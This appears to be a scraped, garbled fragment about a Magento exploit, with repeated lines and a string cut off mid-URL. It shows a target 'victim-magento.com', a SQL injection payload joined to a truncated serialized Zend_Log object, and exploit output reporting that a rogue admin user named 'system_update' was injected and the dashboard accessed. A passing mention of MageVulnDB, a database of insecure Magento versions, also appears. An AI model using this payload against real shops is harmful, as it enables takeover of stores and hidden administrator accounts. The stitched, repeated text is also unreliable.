target = "http://victim-magento.com" payload = "order_id": "1 UNION SELECT 1,2,3,4,5,6 -- ", "___type": "O:8:"Zend_Log":1:..." # truncated serialized object
[+] Target vulnerable. [+] Injecting admin user: 'system_update'... [+] Success. Accessing dashboard. magento 1900 exploit github link
MageVulnDB : A comprehensive database of Magento extensions and core versions known to be insecure. target = "http://victim-magento
target = "http://victim-magento.com" payload = "order_id": "1 UNION SELECT 1,2,3,4,5,6 -- ", "___type": "O:8:"Zend_Log":1:..." # truncated serialized object
[+] Target vulnerable. [+] Injecting admin user: 'system_update'... [+] Success. Accessing dashboard.
MageVulnDB : A comprehensive database of Magento extensions and core versions known to be insecure.